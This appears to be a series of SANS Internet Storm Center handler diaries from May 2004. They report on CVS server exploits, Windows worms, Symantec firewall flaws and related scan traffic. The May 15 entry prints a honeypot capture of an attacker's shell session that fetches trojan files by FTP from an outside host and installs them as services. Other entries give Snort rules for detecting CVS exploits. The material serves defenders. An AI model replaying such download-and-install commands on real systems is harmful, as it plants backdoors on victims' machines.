Published: 2004-05-31

All's quiet on the Internet ...

It's been a quiet weekend, Internet malfeasance-wise, so in place of emerging threats the handlers have some advice.

Since this is traditionally the start of the summer travel season (at least in the Northern hemisphere), I felt an infosec travel advisory was in order. Many of you will be traveling for business or pleasure, and will end up using the Internet services in your hotel. Keep in mind that more often than not, these connections are completely unprotected from the outside world. If you're bringing your own machine (or your work's machine) be very careful - this is not your local LAN. At one chain of hotels I often stay at while traveling, I am assigned a publicly addressable IP address with no discernible security infrastructure in place.

Besides outside threats, your system (and more importantly, the data contained therein) is at risk from internal attacks. POP3/IMAP/HTTP credentials can easily be sniffed, and man-in-the-middle attacks are trivially performed by your neighbor. Any file shares you've set up for your home/office LAN use are now available to several hundred hotel guests - make sure you're implementing proper host-based security. This point is even more applicable for those of you attending SANS training or any information security conferences.

This isn't ground breaking, and it isn't rocket science. However, it's all too easy for the keepers of the gates to forget that best practices and defense in depth concepts apply to them, as well.

"I Went To $SECURITY_EVENT and all I got was owned" T-shirts will not impress your peers.


Published: 2004-05-28

CVSHOME.ORG back on-line

CVShome.org is back on-line with patched versions.

The main site http://www.cvshome.org is back up and stable version 1.11.16 is available.

Again, we would like to reiterate their warning: "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched"

2277/TCP scanning detected. We're interested in captures of any ncat sessions or other captures of more than SYNs or firewall drops.

Other than that, a mostly quiet pre-holiday-weekend Friday.


Published: 2004-05-27

More CVS woes

It appears that the trouble at CVShome is worse than originally thought.

The main site http://www.cvshome.org is still down. German online magazine Heise (1) carries a report from Derek Reboer Price of the CVS team. In it, Price explains that the cvshome servers were breached and a root kit installed, prior to the CVS patches being applied. No further details on the initial breach are available at this time.

The CVS-Bugs mailing list archive (2) carries Price's original posting. In it, he theorises that "...cvshome.org was abused to send the email using a root kit installed prior to the patching of its CVS server for CAN-2004-0396." He advises that "any CVS server running a release of CVS earlier than 1.11.16 or 1.12.8 be taken down immediately and patched."

(1) Heise online magazine http://www.heise.de/security/news/meldung/47645

(2) CVS Bugs http://mail.gnu.org/archive/html/bug-cvs/2004-05/msg00380.html
Mark Cooper mark at mhc-online co uk


Published: 2004-05-26

A quiet day on the Internet

Today a report was made of a spyware package which was digitally signed. The package dropped 2 dlls on the pc called kicom.dll and kxcom.dll. A delivery method has not been identified yet.

For removal see

This is not new, it was published in February.

And an unconfirmed report that Norton Internet Security 4.0 2002, 2003 & 2004 for Windows has added a new feature which pre-scans the inline html images prior to writing the images to the temp directory and displaying them in the web-browser. This effort is to try to identify web borne worms and viruses. The unfortunate side effect is that pages load incredibly slowly. The report stated that Verizon's page took over 3 minutes to load with the scanner and under 3 seconds without it. This could result in users disabling their firewalls which is not a good thing.

Dan Goldberg dan at madjic.net


Published: 2004-05-25

Another day in the life - Padobot, ports 5000, 135, 445

Overall It has been a fairly quiet day for the Internet at large. Just the "normal" elevated background noise and another MS worm-du-jour.

Another worm hit the streets exploiting the known Windows LSASS
vulnerability. Kaspersky Labs calls this one Padobot, with both an "a" and "b" signature. Details are at:

The LSASS vulnerability is discussed in numerous Handlers Diaries, as well as Microsoft Security Bulletin MS04-011:

Possibly as a result, some have reported a very steep rise in port 5000 SYN scans. Upon closer examination, it looks like port 5000 (PnP) is being used to locate Windows hosts, after which connection attempts are made to ports 135 or 445. Here's a sample trace:

2004/05/25 11:23:02.222515 IP > target.net.126.5000: S win 16384

2004/05/25 11:23:02.228521 IP target.net.126.5000 > S ack 1444642199 win 5840

2004/05/25 11:23:02.691561 IP > target.net.126.5000: . ack win 17520

2004/05/25 11:23:02.703911 IP > target.net.126.5000: F ack win 17520

2004/05/25 11:23:02.708177 IP > target.net.126.445: S win 16384

2004/05/25 11:23:02.710557 IP target.net.126.5000 > . ack 0 win 5840

2004/05/25 11:23:03.146508 IP target.net.126.5000 > P ack win 5840

2004/05/25 11:23:03.187780 IP target.net.126.5000 > F ack win 5840

2004/05/25 11:23:03.576007 IP > target.net.126.5000: R win 0

2004/05/25 11:23:03.626723 IP > target.net.126.5000: R win 0

2004/05/25 11:23:05.445877 IP > target.net.126.135: S win 16384

2004/05/25 11:23:07.970316 IP > target.net.126.135: S win 16384

2004/05/25 11:23:12.237244 IP > target.net.126.445: S win 16384

2004/05/25 11:23:14.512929 IP > target.net.126.135: S win 16384

2004/05/25 11:23:17.374700 IP > target.net.126.135: S win 16384

2004/05/25 11:23:21.796316 IP > target.net.126.445: S win 16384

A graph of the port 5000 activity against two different networks is at: http://people.ists.dartmouth.edu/~gbakos/port5000.png

This seems to have quickly run its course, as the graph indicates a steep climb, then equally rapid trailoff. No doubt the vast majority of the LSASS pickin's have been had by Sasser and its variants.

George Bakos
gbakos <at> ists.dartmouth.edu


Published: 2004-05-24

Akamai Problems, New Angle(r) On An Old Phish

Akamai Problems

Akamai, the largest of the large scale content delivery services was not delivering content earlier today. According to a post from Akamai:

"An isolated issue occurred this morning (roughly during the period of 8:00 a.m. – 9:30 a.m. ET), where multiple Akamai customers experienced intermittent performance and availability degradation.

This degradation was the result of a bug within one of Akamai's backend content control management tools, which allows the expiration of content on the Akamai network. The degradation was not a result of any outside interference with Akamai's network (such as Denial of Service or hacking).

Upon identification of the bug, Akamai quickly took corrective action which returned customers to normal service levels. Akamai is currently putting measures in place to return the content management tool to its normal working order and is adding safeguards such that the issue will not occur in the future. In the meantime, Akamai customers are able to serve their content through the Akamai Network normally."

So, although it sounds like the rollout of a new version of an internal tool caused them to essentially DoS themselves, things seem to be all better now.

New Angle(r) On An Old Phish

First of all, my apologies for the headline... I couldn't help myself.

It seems that the phisher folk have found some new bait. The newest angle(r) involves sending out fake "order confirmation" messages bearing links that lead to web pages containing exploits for some older IE vulnerabilities. The idea is that no one will be able to resist simply looking at where the link points, and that the phisher will then snag a few unpatched folk in the process. Let's keep those browsers patched, people. And be careful out there...

Other than that, it's been quiet.

Too quiet...

Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-05-23

Akamai problems. Quiet, well kinda quiet, day on the Internet

Update (Mon. May 24th 9 am EST, 13:00 UTC, 15:00 CEST ) It appears that websites that use Akamai's distribution system are currently not reachable. Security related web sites effected are symantec.com and trendmicro.com. Virus updates may fail as a result. Further details are currently not available and updates will be posted here as they become available. Thanks to Vidar Wilkens for alerting us of this problem. According to a post to NANOG, the outage may be the result of a DDOS attack. At this point, Akamai has not ETA for a resolution. Update 09:45 EST: Looks like some of the Akamai hosted sites start to come back. Akamai posted this statement: " Due to a peering problem between ATT and UUNet, a subset of UUNet users may have experienced problems accessing Akamai delivered sites between 8-10pm EDT on Saturday May 22, 2004. The problem has been fully resolved. " ------ "Quiet" day on the Internet

We have received a number of reports of live exploitation of cvs servers using the latest round of exploits. http://www.cvshome.org the source for the cvs system, has been down for atleast two days. No news as to what happened, although two speculations exist: the first is that they are doing an extensive review of the site and the sourcecode, and the other is that they are being D-DoS'ed so that people can not update to the latest version of CVS (put your tin-foil hats on!). The rules at the bottom of the Diary, catch the current exploits posted at K-Otik, but beware that these are stopgap rules and should be replaced once better rules do come out. Tcpdump audit trail tidbits

Tidbit #1

This log below is most likely an agobot variant dujour, scanning for 1025 (M$ RPC, LSA exploit, etc), 135 (same goes), 139 (file shares), 2745 (Beagle, Bagle), 3127 (MyDoom), 445 (Sasser, etc), 6129 (Dameware). This is the current trend, imho, of things to come. Scanner bots that come loaded with a smorgasboard of exploits for the latest vulnerabilities. These botnets become varitable virtual armies waiting for the command to blow the next victim off the net. 4:28:11.568873 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.573439 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.581346 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.668977 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.673543 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.679083 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:11.686978 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.071790 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.077521 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.085352 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.171907 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.176461 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.184357 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.189870 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.569024 > foo.foo.foo.107.1025: S 3806759905:3806759905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.574691 > foo.foo.foo.107.135: S 3806718729:3806718729(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.581498 > foo.foo.foo.107.2745: S 3806657657:3806657657(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.668028 > foo.foo.foo.107.139: S 3806979905:3806979905(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.673695 > foo.foo.foo.107.6129: S 3806944602:3806944602(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.680553 > foo.foo.foo.107.3127: S 3806907179:3806907179(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)
04:28:12.686003 > foo.foo.foo.107.445: S 3806843863:3806843863(0) win 64800 <mss 1440,nop,nop,sackOK> (DF)

Tidbit #2
This set is a script looking for Sasser or Dabber compromised machines: 04:45:17.543905 > foo.foo.foo.104.5554: S 3956724128:3956724128(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.546756 > foo.foo.foo.105.5554: S 3956865832:3956865832(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.548661 > foo.foo.foo.100.5554: S 3956524133:3956524133(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.551653 > foo.foo.foo.107.5554: S 3956971377:3956971377(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.553838 > foo.foo.foo.101.5554: S 3956567526:3956567526(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.569655 > foo.foo.foo.110.5554: S 3957084821:3957084821(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.988074 > foo.foo.foo.104.9898: S 3969576284:3969576284(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.990285 > foo.foo.foo.100.9898: S 3969390134:3969390134(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:17.994860 > foo.foo.foo.101.9898: S 3969445181:3969445181(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.038802 > foo.foo.foo.105.9898: S 3971494464:3971494464(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
04:45:18.070218 > foo.foo.foo.107.9898: S 3972130192:3972130192(0) win 64240 <mss 1460,nop,nop,sackOK>
04:45:18.079188 > foo.foo.foo.110.9898: S 3972431609:3972431609(0) win 64240 <mss 1460,nop,nop,sackOK> (DF)
Whats happening on your net at O'Dark-thirty? Use the ISC contact link to let us know ( http://isc.sans.org/contact.php)

Want to share your logs with Dshield? Help protect the Net by sharing your logs. Check here to find out how ( http://www.dshield.org/howto.php )

Reposted a previous diary
In response to seeing the cvs exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple snort rules to detect the cvs exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the sid's to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)
alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Handler on Duty: Mike Poor
mike ^AT^ intelguardians.com


Published: 2004-05-21

Exploit code reported for CVS Vulnerability

Follow-up to May 19th Handlers Diary: The cvs exploit published yesterday has seen used multiple times. PATCH NOW!. The cvs main homepage (cvshome.org) appears to be down. However, you should still be able to obtain patches
from mirrors.


We have received information that exploit code has been has been reported by K-OTik Security. This exploit is a particular concern to Unix admins and could be used to compromise a number of open source projects. It is recommended that you verify signatures. This exploit can affect your system even if you don't run CVS Server. Just using software that is maintained using a compromised server will put your system at risk.

One of the Handler's will be setting up a test server this afternoon to confirm that the code works. Stay tuned for more information.

Gentoo update for CVS


Open BSD


This just in from Mike Poor:

In response to seeing the cvs exploits being used in the wild, ISC Handlers George Bakos and Mike Poor put together some simple snort rules to detect the cvs exploits posted at K-Otik. Keep in mind that these are stopgap rules to catch these exploits only, not the vulnerability itself. The exploits are detected by Snort's SHELLCODE rules, but those rules are turned off by default. With the rules below, be sure to change the sid's to match your local.rules numbering. NOTE: these rules will wrap, so eliminate the line feeds when adding them to your local.rules file.

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Linux)"; flow:to_server,established; content:"|45 6e 74 72 79 20 43 43 43 43 43 43 43 43 43 2f 43 43|"; offset:0; depth:20; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000000; rev:1; classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target BSD)"; flow:to_server,established; content:"|45 6e 74 72 79 20 61 61 61 61 61 61 61 61 61 61 61 61|"; offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000001; rev:1;classtype:attempted-admin;)

alert tcp $EXTERNAL_NET any -> $HOME_NET 2401 (msg:"CVS server heap overflow attempt (target Solaris)"; flow:to_server,established; content:"|41 72 67 75 6d 65 6e 74 20 62 62 62 62 62 62 62 62 62|";offset:0; depth:18; dsize: >512; threshold: type limit, track by_dst, count 1, seconds 60 ; sid:1000002; rev:1;classtype:attempted-admin;)

Deb Hale

Handler On Duty


Published: 2004-05-20

Port 135 Traffic Increase Due To Bobax.C

Port 135 Traffic Increase Due To Bobax.C.

A third Bobox variant has been discovered that now uses the RPC/DCOM vulnerability on TCP port 135 in addition to the existing probes on TCP ports 445 and 5000. The DCOM exploit code in Bobax.C contains offsets for both Windows 2000 and Windows XP so Bobax.C can now infect both of these OSes where Bobax.[AB] could only infect Windows XP.

For more details, see http://www.lurhq.com/bobax.html

David Goldsmith

Handler on Duty


Published: 2004-05-19

CVS/Subversion remote holes - Reporting MS vulnerabilities

CVS/Subversion remote vulnerabilities

E-Matters has released information regarding remotely exploitable overflows in the Subversion and CVS version control applications. Both projects have released fixed versions which should be available for most platforms at the time of this writing. Users of these applications are strongly encouraged to update.

The full advisories are available at the following links:

CVS: http://security.e-matters.de/advisories/072004.html
Subversion: http://security.e-matters.de/advisories/082004.html

Reporting a Security Vulnerability in a Microsoft Product

Microsoft's Security Response Center posted the following submission guidelines to multiple security mailing lists earlier today:

"The Microsoft Security Response Center investigates all reports of security vulnerabilities sent to us that affect Microsoft products. If you believe you have found a security vulnerability affecting a Microsoft product, we would like to work with you to investigate it.

We are concerned that people might not know the best way to report security vulnerabilities to Microsoft. You can contact the Microsoft Security Response Center to report a vulnerability by emailing secure@microsoft.com directly, or you can submit your report via our web-based vulnerability reporting form located at:



Microsoft Security Response Center"

Cory Altheide
Handler on Duty


Published: 2004-05-18

Port 5000 Traffic Continues; Fragmented tcp/16191 Update

Port 5000 Traffic Continues. As reported in yesterday's diary, two worms (Bobax and Kibuv.B) are responsible for the increase in tcp/5000 traffic. Microsoft Windows systems that are currently patched are not vulnerable to either worm.

Fragmented tcp/16191 Update Additional information on the report of fragmented IP traffic towards port 16191 in the May 14 diary ( http://isc.sans.org/diary.php?date=2004-05-14 ) arrived in the mailbag today. James tells us,

"I have seen this before inside my network, and recently am seeing it again, including a couple of hits from outside now. Using Cisco v2 IDS sensors on my internal network I always see these as a set of 3 signatures:

1203 - IP fragment overwrite - Data is overwritten

1204 - IP fragment missing initial fragment

1208 - IP fragment incomplete dgram

The Cisco IDS usually indicates whether a port is a TCP or UDP port, but in this case the protocol field of the alert simply says IP."

Handler Ed Skodis explains, "That's likely because the higher-layer protocol (TCP or UDP) header is typically included in the first fragment, including the port number itself. Therefore, because you are getting:

1204 - IP fragment missing initial fragment

You aren't seeing the TCP/UDP stuff, so the IDS labels it merely as IP."

Additional details from Cisco on packet fragmentation is online at http://www.cisco.com/univercd/cc/td/doc/product/iaabu/csids/csids4/11657_02.htm#xtocid11

Marcus H. Sachs

Handler on Duty


Published: 2004-05-17

Port 5000 increase due to two worms: Bobax and Kibuv

Two very different worms are currently responsible for the rapid increase in
port 5000 scans. The first, 'Bobax', uses port 5000 to identify Windows XP
systems. Windows XP uses port 5000 (TCP) for 'Universal Plug and Play (UPnP)'. By
default, UPnP is enabled. The second worm, 'Kibuv', will use an old vulnerability

in Windows XP's UPnP implementation to exploit systems. This vulnerability was one
of the first discovered in Windows XP and patches have been available.


Joe Stewart (LURHQ Corp.) compiled an analysis of this worm:

. Short summary for the inpatient:
Installs an HTTP listener on a random port ( 2000-62000). This HTTP server
is used to deliver the trojan to infected systems.

Scans port 5000 (tcp). If port 5000 responds, the LSASS exploit will be used
to compromise the host and download the trojan from the infecting system's http server

Contacts one of a number of web servers to notify them of the successful

Kibuv.B will start and FTP server on port 7955. Any username / password combination will work. The FTP server will always send a copy of the worm,
regardless of the file requested. This is similar to other malware ftp serves.

Kibuv.B uses 7 different mechanisms to spread:

Messenger Service Buffer Overrun

IIS 5.0 WebDav vulnerability

UPnP Buffer Overflow

RPC DCOM Buffer Overflow

LSASS vulnerability

backdoors created by Weird and Beagle

Sasser FTP server overflow

The IRC server used to control Kibuv.B infected systems is no longer accepting
Kibuv will open a backdoor on port 420 (tcp).
More details: http://securityresponse.symantec.com/avcenter/venc/data/w32.kibuv.b.html

None of the vulnerabilities used by these two worms is new. Unpatched systems are likely infected with other worms and do as such not provide a significant new threat. So far, we only count about 500,000 infected systems with either worm, which is just about on the same level as Sasser and Blaster.

Johannes Ullrich, jullrich_AT_sans.org


Published: 2004-05-16

SANS ISC (once again) and Microsoft - Flatten Compromised Systems

A few days after Johannes Ullrich, SANS CTO, posted some of the ISC's compelling reasons why rebuilding a compromised system should be considered a best practice (for the umpteenth needed time, link below), ISC Handler Chris Carboni shared a link to a May 7th paper reciting Microsoft's reasons that can support rebuilding as a "best practice" (by Jesper M. Johansson, Security Program Manager, Microsoft Corporation). The author's take on "flattening compromised systems" and other issues is a great read and addition to the body of best practice recommendations to rebuild compromised systems.

Experience shows that rebuilding a compromised system is a best practice that some people responsible for the security of systems still want to ignore (in both *NIX & Microsoft shops). These are the folks that will have the time to read the following article ( ; ^ ). So .... if ensuring the confidentiality, integrity and availability of your employer's network, and safekeeping their business and their customers are not good enough reasons to make rebuilding a best practice for compromised systems in your shop, consider the following best practice and career advice from the Microsoft article (my highlighting);

"The only way to clean a compromised system is to flatten and rebuild. That’s right. If you have a system that has been completely compromised, the only thing you can do is to flatten the system (reformat the system disk) and rebuild it from scratch (reinstall Windows and your applications). Alternatively, you could of course work on your resume instead, but I don’t want to see you doing that."
(Help: I Got Hacked. Now What Do I Do? by Jesper M. Johansson, Security Program Manager, Microsoft Corporation: May 7, 2004)


ISC's recent, needed, umpteenth and not last publication of some of the reasons why "clean up tools may not be adequate" is at;


Port 8000 activity is increasing, tip o' the hat to Ken Connelly's consistently informative Intrusions.Org Log posts;
Dshield Port 8000 Numbers;

Two sharp eyed readers correctly pointed out that these scans are more likely for HP print servers with HP Web JetAdmin vulnerabilities. We have received reports of successful exploitation of vulnerable systems.


Last Week's Internet Storm Center: Threat Update Archive is available

If you missed last weeks Internet Storm Center: Threat Update Featuring: Johannes Ullrich, Marcus Sachs and fascinating Q & A submissions ( ; ^ ), you can catch the archived briefing (audio and pdf) by logging in to your SANS Portal account;

Patrick Nolan


Published: 2004-05-15

Symantec DOS Exploit Code, Sasser Backdoor Exploit Capture, Reading Material

Exploit code for Symantec Multiple Firewall DNS Response DOS Released

Code exploiting the recently published vulnerability ( http://www.eeye.com/html/Research/Advisories/AD20040512B.html ) in some of Symantec's security products (Norton Internet Security, Norton Personal Firewall, and Norton Anti-Spam) has been posted on Bugtraq. This vulnerability does not provide a remote shell, but is a Denial-of-Service attack.

Again, if you run these products, please update them using Live Update. We predict that it's only a matter of time before we see a "Witty"-like worm in the wild.

Sasser Backdoor Exploit Honeypot Capture

LURHQ's Joe Stewart has provided the following capture of the Sasser Backdoor Exploit. This capture was of an interactive session, not an automated tool.

<snipped exploit hexdump>

mandragore bsh shellcode detected

Bind port is 9875

Binding shell on port 9875

Connection on 9875 from

C:\WINNT\system32>echo open LC0311-A.STUDENT.TCU.EDU 6789 > id

C:\WINNT\system32>echo user root root >> id

C:\WINNT\system32>echo bin >> id

C:\WINNT\system32>echo get service.exe >> id

C:\WINNT\system32>echo get mss32.dll >> id

C:\WINNT\system32>echo get sub0t.dll >> id

C:\WINNT\system32>echo get SUB0T.ini >> id

C:\WINNT\system32>echo get mshelp.exe >> id

C:\WINNT\system32>echo bye >> id

C:\WINNT\system32>ftp.exe -i -n -s:id

C:\WINNT\system32>erase id


C:\WINNT\system32>service.exe /i

C:\WINNT\system32>net start mshelp

C:\WINNT\system32>net start secman


Connection closed by peer

Selected Reading Material

For your quiet Saturday reading, posted May 2, 2004 to the SANS Reading Room, "A Security Checklist for Web Application Design," by Gail Zemanek Bayse.



Handler-on-Duty: Dave Brookshire ( dsb_AT_rlx.com )


Published: 2004-05-14

Increase in TCP 5554 activity; Fragmented IP traffic towards port 16191; Please patch your Symantec/Norton firewall products

Increase in TCP 5554 activity

Looks like there is an increase in TCP 5554 activity. This is due to
public exploits against the FTP daemon installed by the Sasser worm and
may be related to the "Dabber" worm covered in yesterday's diary entry.
Basically, this is malware attacking malware. If you aren't infected
with the Sasser worm, then you won't be infected with this.

In addition to the "Dabber" automated worm, we have reports that the
exploit is being manually executed against vulnerable hosts, which is
somewhat rare in these days of automated exploits and bot networks.



Fragmented IP traffic towards port 16191

We have received a report of fragmented IP traffic with source and
destination ports both set to 16191. At this point, we don't have
many details but would like to see if anybody else is seeing similar

Please patch your Symantec/Norton firewall products

As discussed in the diaries for the last two days, there are several
vulnerabilities in Symantec/Norton firewall products. Exploit code is
currently being developed. If you run these products (even behind
other firewalls), you are highly urged to apply the vendor patches.
You may recall the worm "Witty" attacked a similar flaw in ISS products
that caused major problems for people running those products.

Download the patches here:



Remember the Witty worm:




Published: 2004-05-13

Vulnerabilities in Symantec Products, Dabber Worm, Empty .zip File Attachments

Vulnerabilities in Symantec Products. eEye Digital Security recently discovered four vulnerability issues in the Symantec Client Firewall products for Windows. If properly exploited, an attacker could render the targeted system inoperable or execute remote code with kernel-level privileges on the targeted system. Details are available from Symantec at

The eEye bulletins with complete details on the issues are at




At least one of these issues can be exploited by a single packet. Advisory AD20040512A states that, "By sending a single specially-crafted NetBIOS Name Service (UDP port 137) packet to a vulnerable host, an attacker could cause an arbitrary memory location to be overwritten with data he or she controls, leading to the execution of attacker-supplied code with kernel privileges and the absolute compromise of the target."

This puts the Internet community in the same position as we were prior to the release of the Witty worm several weeks ago. If you use any of the affected products on the list below you should immediately ensure that you have updated your software per the instructions on the Symantec link above. Affected systems include


Symantec Norton Internet Security and Professional 2002, 2003, 2004

Symantec Norton Personal Firewall 2002, 2003, 2004

Symantec Norton AntiSpam 2004


Symantec Client Firewall 5.01, 5.1.1

Symantec Client Security 1.0, 1.1, 2.0(SCF 7.1)

Dabber Worm. Joe at LURHQ notified us that they discovered a new worm exploiting a vulnerability in the FTP server component of the Sasser worm. According to their advisory, this worm will only infect users already infected by Sasser. They have tentatively named this worm "Dabber". Details are at

Empty .zip File Attachments. From the mailbag today we heard about multiple cases where spam emails are being received containing the conventional .zip attachment and a graphical password in the text, but opening the attachment revealed an empty .zip archive. The best theory we have is that the sender of the spam is unable to create a properly constructed .zip file, and sends a small fragment with the .zip extension. Other theories are welcome.

Marcus H. Sachs

Handler on Duty


Published: 2004-05-12

Symantec Products Vulnerabilties / Worm Password List / Mailbag-Netsky


Symantec Multiple Firewall NBNS Response Processing Stack Overflow

Update: This is just a head up about multiple vulnerabilities found on Symantec Products. Expect a more detailed explanation on tomorrows diary.

Reference: http://www.eeye.com/html/Research/Advisories/AD20040512A.html

Worm Passwords List

Passwords are in general, the weakest link in the corporate security strategy.
In the 2003 edition of SANS Top 20 vulnerabilities, weak
passwords are listed as one major vulnerability:

Item 4.1 Description:

"Passwords, passphrases and/or security codes are used in
virtually every interaction between users and information
systems. Most forms of user authentication, as well as
file and data protection, rely heavily on user or vendor
supplied passwords. In addition, since properly
authenticated access is often not logged, or if logged not
likely to arouse suspicion, a compromised password is an
opportunity to explore a system virtually undetected. An
attacker in possession of a valid user password would
have complete access to any resources available to that
user, and would be significantly closer to being able to
access other accounts, nearby machines, and perhaps even
obtain root level access on this system. Despite this
threat, user and administrator level accounts with poor or
non-existent passwords are still very common. As well,
organizations with a well-developed and enforced password
policy are still uncommon.
The most common password vulnerabilities are: (a) user
accounts that have weak or nonexistent passwords; (b) users
accounts with widely known or openly displayed passwords;
(c) system or software created administrative level
accounts with widely known, weak, or nonexistent passwords;
and (d) weak or well known password hashing algorithms
and/or user password hashes that are stored with weak
security and are visible to anyone.
The best defense against all of these vulnerabilities is a
well developed password policy that includes: detailed
instructions for users to create strong passwords;
explicit rules for users to ensure their passwords remain
secure; a process in place for IT staff to promptly replace
weak/insecure/default or widely known passwords and
to promptly lock down inactive or close down unused
accounts; and a proactive and regular process of checking
all passwords for strength and complexity. "
In today's ISC Webcast, we talked about an example of a password
list that was used by malware known as "IRCBot" to guess/brute force
passwords to get access on systems.
This list is available at:

Did you miss our monthly ISC Webcast?

Check out the Webcast archives:
Mailbag - Netsky
We received a report from a user who had been seeing a
large number of DNS queries from a small set of his high
speed customers. The answer, as pointed by Rick Wanner, was
that it was caused by NetSky. From his words: "...I didn't
realize that the deciding factor for what is an email
address is anything with an "@" sign in the name, or
contents would be tried as an email address. So people
with big Internet caches, and who don't clean up their
cookies were generating thousands of MX requests per minute
to their default DNS server."

Handler on duty: Pedro Bueno (bueno_AT_ieee.org)


Published: 2004-05-11

May Microsoft Patches Available

May Microsoft Patches Available

Microsoft posted a single security update as part of their regularly scheduled "Second Tuesday of the Month" release. MS04-015, "Vulnerability in Help and Support Center Could Allow Remote Code Execution (840374)" patches an existing vulnerability in the "Help and Support Center" as found in Windows XP and Windows Server 2003.

Because of the way that it handles certain "HCP" URLs, the Help and Support Center is vulnerable to the possibility of remote code execution. The vulnerability could be exploited by a malicious HCP URL and could potentially allow remote code execution. In order for the attack to work, the attacker would only need to convince a user to click on a link to malicious code. Exploiting this vulnerability could allow a malicious attacker to take complete control of an affected system.

According to Microsoft, this issue is rated only as "Important" because they believe that "significant user interaction is required" to exploit the vulnerability.

Further information can be found at:


Also, for more information on the impact of this patch, as well as an update on the latest threats to our networks, join us for the monthly ISC Threat Update webcast, Wednesday, May 12 at 2:00 PM EDT (1800 UTC).

For more information:



Handler on Duty: Tom Liston ( http://www.labreatechnologies.com )


Published: 2004-05-10

New Sasser Worm FTP exploit and Java DOS

We received a submission of an exploit for Sasser's FTP server. It
appears to be a buffer overflow targeting port 5554 by default. If successful it will spawn a shell. The published exploit code lists the shell listening on port 5300. We are seeing code in the wild using port 53 for the shell.

Sun announced a DOS vulnerability in the JRE today on May 6 which may allow a remote unprivileged user to cause the Java Virtual Machine to become unresponsive

The announcement: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57555

SDK and JRE releases are available at: http://java.sun.com/j2se/

SDK and JRE 1.4.2_03 or earlier 1.4.2 releases are affected.

Dan Goldberg Dan at MADJiC dot net


Published: 2004-05-09

Happy Mother's Day

Happy Mother's Day to wonderful Mom's all over the world from the SANS handlers.


Published: 2004-05-08

Author of Sasser worm and Phatbot caught; New Sasser Worm Variant; SANS Security Newsletters and Digests

Author of Sasser worm and Phatbot caught

